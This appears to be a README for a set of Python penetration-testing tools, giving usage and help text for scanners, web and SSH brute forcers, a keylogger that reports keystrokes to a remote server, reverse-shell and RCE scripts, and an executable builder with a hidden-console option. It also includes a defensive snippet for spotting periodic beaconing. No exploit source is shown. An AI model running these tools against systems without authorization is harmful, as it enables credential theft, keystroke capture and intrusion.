A collection of Python-based penetration testing tools for various security testing scenarios.
- Subdomain Enumeration: DNS-based subdomain discovery with threading
- Keylogger: Captures keystrokes and sends them to a remote server
- Port Scanner: Scans for open ports and grabs service banners
- Web Crawler: Downloads JavaScript files from websites
- Brute Forcers: Web login and SSH brute forcing with threading
- Windows Executable Builder: Creates standalone Windows executables
pip install -r requirements.txt
Create a requirements.txt file with:
requests
paramiko
pyfiglet
bs4
keyboard
dnspython
pyinstaller
Uses DNS requests to enumerate potential subdomains with threading support.
python subdomains.py example.com -w wordlist.txt -t 20
Captures keystrokes and sends them to a remote server. Can run in client or server mode.
Server Mode:
python keylogger.py server --type http --port 8080
Client Mode:
python keylogger.py client --url http://server-ip:8080
Scans for open ports and grabs service banners with threading support.
python portscanner.py 192.168.1.1 -r 1-1000 -t 100
Crawls websites and downloads JavaScript library files.
python filedownloader.py crawl https://example.com --js --depth 3
Web login and SSH brute forcing with threading support.
Web Login:
python bruteforce.py http://target.com/login -u admin -P passwords.txt -t 20
SSH:
python sshbruteforce.py 192.168.1.1 -u root -P passwords.txt -t 10
Creates standalone Windows executables for all tools.
python build_exe.py all
usage: subdomains.py [-h] [-w WORDLIST] [-t THREADS] domain
DNS-based subdomain scanner with threading
positional arguments:
domain Target domain to scan (e.g., example.com)
optional arguments:
-h, --help show this help message and exit
-w WORDLIST, --wordlist WORDLIST
Path to wordlist file (default: subdomains.txt)
-t THREADS, --threads THREADS
Number of threads to use (default: 10)
usage: keylogger.py {client,server} ...
Keylogger with remote reporting capabilities
positional arguments:
{client,server} Operating mode
client Run as keylogger client
server Run as keylogger server
optional arguments:
-h, --help show this help message and exit
Client Mode:
usage: keylogger.py client [-h] [--url URL] [--ip IP] [--port PORT]
[--interval INTERVAL] [--log LOG]
optional arguments:
-h, --help show this help message and exit
--url URL Server URL for HTTP reporting (e.g., http://example.com:8080)
--ip IP Server IP for socket reporting
--port PORT Server port for socket reporting
--interval INTERVAL Reporting interval in seconds (default: 60)
--log LOG Local log file (default: keylog.txt)
Server Mode:
usage: keylogger.py server [-h] [--type {http,socket}] [--host HOST]
[--port PORT] [--log LOG]
optional arguments:
-h, --help show this help message and exit
--type {http,socket} Server type (default: http)
--host HOST Host to bind server to (default: 0.0.0.0)
--port PORT Port to bind server to (default: 8080)
--log LOG Server log file (default: server_keylog.txt)
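
The client options above describe reporting to an HTTP server at a fixed interval (default: 60 seconds), which appears in proxy or flow logs as evenly spaced requests from one host to one destination. A defender-side check for that pattern, as an added example that is not part of this repository; the record layout, thresholds and sample entries are assumptions constructed for illustration:

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample proxy records: (epoch_seconds, source_host, destination).
# 10.0.0.7 contacts one destination every ~60 s; 10.0.0.9 browses irregularly.
SAMPLE_LOG = [
    (1000, "10.0.0.7", "198.51.100.20:8080"),
    (1013, "10.0.0.9", "intranet.example:443"),
    (1060, "10.0.0.7", "198.51.100.20:8080"),
    (1071, "10.0.0.9", "intranet.example:443"),
    (1121, "10.0.0.7", "198.51.100.20:8080"),
    (1180, "10.0.0.7", "198.51.100.20:8080"),
    (1195, "10.0.0.9", "intranet.example:443"),
    (1240, "10.0.0.7", "198.51.100.20:8080"),
    (1702, "10.0.0.9", "intranet.example:443"),
    (1730, "10.0.0.9", "intranet.example:443"),
]


def find_periodic_flows(records, min_events=5, max_jitter=0.1):
    """Return flows whose request spacing is nearly constant.

    A flow is a (source, destination) pair. Jitter is the coefficient of
    variation of the gaps between consecutive requests (stdev / mean);
    scheduled reporting gives a value near 0, interactive traffic does not.
    """
    times = defaultdict(list)
    for ts, src, dst in records:
        times[(src, dst)].append(ts)

    findings = []
    for flow, stamps in times.items():
        if len(stamps) < min_events:
            continue  # too few requests to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all requests share one timestamp: not a timed report
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({"flow": flow, "interval": round(avg),
                             "jitter": round(jitter, 3), "events": len(stamps)})
    return findings


if __name__ == "__main__":
    for hit in find_periodic_flows(SAMPLE_LOG):
        print(hit)
```
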
usage: portscanner.py [-h] [-p PORTS | -r RANGE | -a] [-t THREADS]
[--timeout TIMEOUT]
target
Port scanner with banner grabbing
positional arguments:
target Target IP address
optional arguments:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Specific ports to scan (comma-separated)
-r RANGE, --range RANGE
Port range to scan (start-end)
-a, --all Scan all ports (1-65535)
-t THREADS, --threads THREADS
Number of threads (default: 100)
--timeout TIMEOUT Connection timeout in seconds (default: 1.0)
usage: filedownloader.py {download,crawl} ...
Web crawler and file downloader
positional arguments:
{download,crawl} Operating mode
download Download a single file
crawl Crawl a website and download files
optional arguments:
-h, --help show this help message and exit
Download Mode:
usage: filedownloader.py download [-h] [-o OUTPUT] url
positional arguments:
url URL of the file to download
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output file path
Crawl Mode:
usage: filedownloader.py crawl [-h] [-d DEPTH] [-t THREADS] [-o OUTPUT]
[--js] [--css] [--images]
url
positional arguments:
url Starting URL to crawl
optional arguments:
-h, --help show this help message and exit
-d DEPTH, --depth DEPTH
Maximum crawl depth (default: 2)
-t THREADS, --threads THREADS
Number of threads (default: 5)
-o OUTPUT, --output OUTPUT
Output directory (default: downloads)
--js Download JavaScript files (default: True)
--css Download CSS files
--images Download image files
usage: bruteforce.py [-h] [-u USERNAME] [-U USERLIST] [-p PASSWORD]
[-P PASSLIST] [-g GENERATE] [--user-field USER_FIELD]
[--pass-field PASS_FIELD] [--error ERROR]
[--success SUCCESS] [--method {GET,POST}] [-t THREADS]
[-q]
url
Threaded web login brute forcer
positional arguments:
url Target URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to use
-U USERLIST, --userlist USERLIST
File containing usernames
-p PASSWORD, --password PASSWORD
Password to use
-P PASSLIST, --passlist PASSLIST
File containing passwords
-g GENERATE, --generate GENERATE
Generate numeric passwords of specified length
--user-field USER_FIELD
Username form field name (default: username)
--pass-field PASS_FIELD
Password form field name (default: password)
--error ERROR Error message that appears on failed login (default: Invalid)
--success SUCCESS Success message that appears on successful login
--method {GET,POST} HTTP method (default: POST)
-t THREADS, --threads THREADS
Number of threads (default: 10)
-q, --quiet Quiet mode (less output)
usage: sshbruteforce.py [-h] [-p PORT] [-u USERNAME] [-U USERLIST] -P PASSLIST
[-t THREADS] [--timeout TIMEOUT] [-q]
target
Threaded SSH brute forcer
positional arguments:
target Target IP address or hostname
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT SSH port (default: 22)
-u USERNAME, --username USERNAME
Username to use
-U USERLIST, --userlist USERLIST
File containing usernames
-P PASSLIST, --passlist PASSLIST
File containing passwords
-t THREADS, --threads THREADS
Number of threads (default: 10)
--timeout TIMEOUT Connection timeout in seconds (default: 5)
-q, --quiet Quiet mode (less output)
usage: build_exe.py {single,all} ...
Build Windows executables from Python scripts
positional arguments:
{single,all} Build mode
single Build a single script
all Build all scripts in the repository
optional arguments:
-h, --help show this help message and exit
Single Mode:
usage: build_exe.py single [-h] [-o OUTPUT] [-i ICON] [--dir] [--no-console]
[-n NAME]
script
positional arguments:
script Path to Python script
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output directory (default: dist)
-i ICON, --icon ICON Path to icon file (.ico)
--dir Build as directory instead of single file
--no-console Hide console window
-n NAME, --name NAME Custom name for the executable
All Mode:
usage: build_exe.py all [-h] [-o OUTPUT] [-i ICON] [--dir] [--no-console]
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output directory (default: dist)
-i ICON, --icon ICON Path to icon file (.ico)
--dir Build as directory instead of single file
--no-console Hide console window
Network discovery using ARP requests:
python arp_scan.py
Web directory enumeration tool:
python directory.py [URL]
MD5 hash cracking tool:
python hashcracker.py
- Interactive Shell:
python rce_interactive.py
- Reverse Shell:
python rce_reverse_shell.py
- Simple RCE Test:
python rce_whoami.py
Scans for SQLi and XSS vulnerabilities:
python scanner.py [URL]
Exploits session-based vulnerabilities:
python session_exploit.py
These tools are for educational purposes and authorized security testing only. Do not use them against systems you don't own or have explicit permission to test.